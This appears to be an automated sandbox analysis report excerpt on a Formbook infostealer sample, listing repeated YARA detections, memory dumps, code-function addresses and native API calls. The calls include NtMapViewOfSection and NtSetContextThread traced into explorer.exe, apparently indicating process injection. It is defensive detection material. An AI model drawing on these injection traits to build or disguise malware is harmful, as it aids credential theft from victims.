            Source: Yara matchFile source: 00000010.00000002.509765743.0000000004E60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.373929378.0000000000FC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Source: 11.0.tlBHrCrteFXy8Jz.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 11.0.tlBHrCrteFXy8Jz.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 11.0.tlBHrCrteFXy8Jz.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 11.0.tlBHrCrteFXy8Jz.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 11.0.tlBHrCrteFXy8Jz.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 11.0.tlBHrCrteFXy8Jz.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 11.2.tlBHrCrteFXy8Jz.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 11.2.tlBHrCrteFXy8Jz.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 11.0.tlBHrCrteFXy8Jz.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 11.0.tlBHrCrteFXy8Jz.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 11.0.tlBHrCrteFXy8Jz.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 11.0.tlBHrCrteFXy8Jz.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 11.2.tlBHrCrteFXy8Jz.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 11.2.tlBHrCrteFXy8Jz.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 0.2.tlBHrCrteFXy8Jz.exe.445b350.4.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 0.2.tlBHrCrteFXy8Jz.exe.445b350.4.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 0.2.tlBHrCrteFXy8Jz.exe.44b2170.3.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 0.2.tlBHrCrteFXy8Jz.exe.44b2170.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 0000000D.00000000.358128872.000000000B7CA000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 0000000D.00000000.358128872.000000000B7CA000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 0000000B.00000000.299250808.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 0000000B.00000000.299250808.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000010.00000002.510355464.0000000004F80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000010.00000002.510355464.0000000004F80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 0000000B.00000002.373779572.0000000000F40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 0000000B.00000002.373779572.0000000000F40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000010.00000002.509514447.0000000002F80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000010.00000002.509514447.0000000002F80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 0000000D.00000000.337152454.000000000B7CA000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 0000000D.00000000.337152454.000000000B7CA000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000000.00000002.304067071.0000000004319000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000000.00000002.304067071.0000000004319000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 0000000B.00000000.299753354.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 0000000B.00000000.299753354.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 0000000B.00000002.372769249.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 0000000B.00000002.372769249.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000010.00000002.509765743.0000000004E60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000010.00000002.509765743.0000000004E60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 0000000B.00000002.373929378.0000000000FC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 0000000B.00000002.373929378.0000000000FC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: tlBHrCrteFXy8Jz.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
            Source: 11.0.tlBHrCrteFXy8Jz.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 11.0.tlBHrCrteFXy8Jz.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 11.0.tlBHrCrteFXy8Jz.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 11.0.tlBHrCrteFXy8Jz.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 11.0.tlBHrCrteFXy8Jz.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 11.0.tlBHrCrteFXy8Jz.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 11.2.tlBHrCrteFXy8Jz.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 11.2.tlBHrCrteFXy8Jz.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 11.0.tlBHrCrteFXy8Jz.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 11.0.tlBHrCrteFXy8Jz.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 11.0.tlBHrCrteFXy8Jz.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 11.0.tlBHrCrteFXy8Jz.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 11.2.tlBHrCrteFXy8Jz.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 11.2.tlBHrCrteFXy8Jz.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 0.2.tlBHrCrteFXy8Jz.exe.445b350.4.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0.2.tlBHrCrteFXy8Jz.exe.445b350.4.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 0.2.tlBHrCrteFXy8Jz.exe.44b2170.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0.2.tlBHrCrteFXy8Jz.exe.44b2170.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 0000000D.00000000.358128872.000000000B7CA000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0000000D.00000000.358128872.000000000B7CA000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 0000000B.00000000.299250808.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0000000B.00000000.299250808.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000010.00000002.510355464.0000000004F80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000010.00000002.510355464.0000000004F80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 0000000B.00000002.373779572.0000000000F40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0000000B.00000002.373779572.0000000000F40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000010.00000002.509514447.0000000002F80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000010.00000002.509514447.0000000002F80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 0000000D.00000000.337152454.000000000B7CA000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0000000D.00000000.337152454.000000000B7CA000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000000.00000002.304067071.0000000004319000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000000.00000002.304067071.0000000004319000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 0000000B.00000000.299753354.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0000000B.00000000.299753354.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 0000000B.00000002.372769249.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0000000B.00000002.372769249.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000010.00000002.509765743.0000000004E60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000010.00000002.509765743.0000000004E60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 0000000B.00000002.373929378.0000000000FC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0000000B.00000002.373929378.0000000000FC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeCode function: 0_2_019672B8
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeCode function: 0_2_019672F8
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeCode function: 0_2_019672E8
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeCode function: 0_2_0196753B
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeCode function: 0_2_01967548
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeCode function: 11_2_0041C024
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeCode function: 11_2_00401026
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeCode function: 11_2_00401030
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeCode function: 11_2_0041B8B6
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeCode function: 11_2_0041C171
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeCode function: 11_2_0041C903
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeCode function: 11_2_0041D273
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeCode function: 11_2_00408C6C
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeCode function: 11_2_00408C70
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeCode function: 11_2_00402D90
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeCode function: 11_2_0041CED1
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeCode function: 11_2_0041BF44
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeCode function: 11_2_0041BF77
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeCode function: 11_2_0041C700
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeCode function: 11_2_00402FB0
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_05210D20
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_052E2D07
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_052E1D55
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_05242581
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_0522D5E0
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_052E25DD
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_0522841F
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_052DD466
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_052E1FF1
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_052EDFCE
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_05236E30
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_052DD616
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_052E2EF7
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_05234120
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_0521F900
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_052399BF
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_052EE824
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_0523A830
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_052D1002
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_052420A0
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_052E20A8
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_0522B090
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_052E28EC
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_052E2B28
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_0523AB40
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_0524EBB0
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_052D03DA
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_052DDBD2
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_052CFA2B
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_052E22AE
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_02F9D271
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_02F9B8B6
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_02F9C903
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_02F9CED1
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_02F82FB0
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_02F88C70
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_02F88C6C
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_02F82D90
            Source: C:\Windows\SysWOW64\explorer.exeCode function: String function: 0521B150 appears 72 times
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeCode function: 11_2_004185D0 NtCreateFile,
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeCode function: 11_2_00418680 NtReadFile,
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeCode function: 11_2_00418700 NtClose,
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeCode function: 11_2_004187B0 NtAllocateVirtualMemory,
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeCode function: 11_2_0041882A NtAllocateVirtualMemory,
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeCode function: 11_2_0041872A NtReadFile,
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeCode function: 11_2_004187AA NtAllocateVirtualMemory,
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_05259540 NtReadFile,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_052595D0 NtClose,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_05259710 NtQueryInformationToken,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_05259780 NtMapViewOfSection,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_05259FE0 NtCreateMutant,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_05259660 NtAllocateVirtualMemory,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_05259650 NtQueryValueKey,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_052596E0 NtFreeVirtualMemory,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_052596D0 NtCreateKey,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_05259910 NtAdjustPrivilegesToken,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_052599A0 NtCreateSection,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_05259860 NtQuerySystemInformation,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_05259840 NtDelayExecution,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_05259A50 NtCreateFile,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_05259520 NtWaitForSingleObject,
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_0525AD30 NtSetContextThread,
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_05259560 NtWriteFile,
